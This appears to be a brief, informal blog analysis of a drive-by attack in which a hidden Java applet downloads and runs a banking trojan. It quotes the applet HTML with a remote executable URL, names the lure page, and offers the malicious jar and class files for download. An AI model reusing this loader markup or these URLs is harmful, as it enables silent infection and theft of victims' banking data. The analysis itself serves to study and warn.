hosted in Spain Barcelona Miarroba Networks S.l)

The method here is this:
the spanish or brasilian hecker uses java aplet to download and execute his banker into remote computers
the malicious url file is this:

to find out how the banker is downloaded and excuted u have to download the index.html file via wget for windows

after downloading the index.html file let’s have a look inside the code

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://dl.dropbox.com/u/12138956/javaloader.exe">

easy no ? the hecker send this url:http://pics24.fileave.com/ to potential victims and if they have java installed after runing the page they are automatically infected

this is threatexpert report:

i let u download Client.jar and Client.class from the page

hosting infos:

Categories: Uncategorized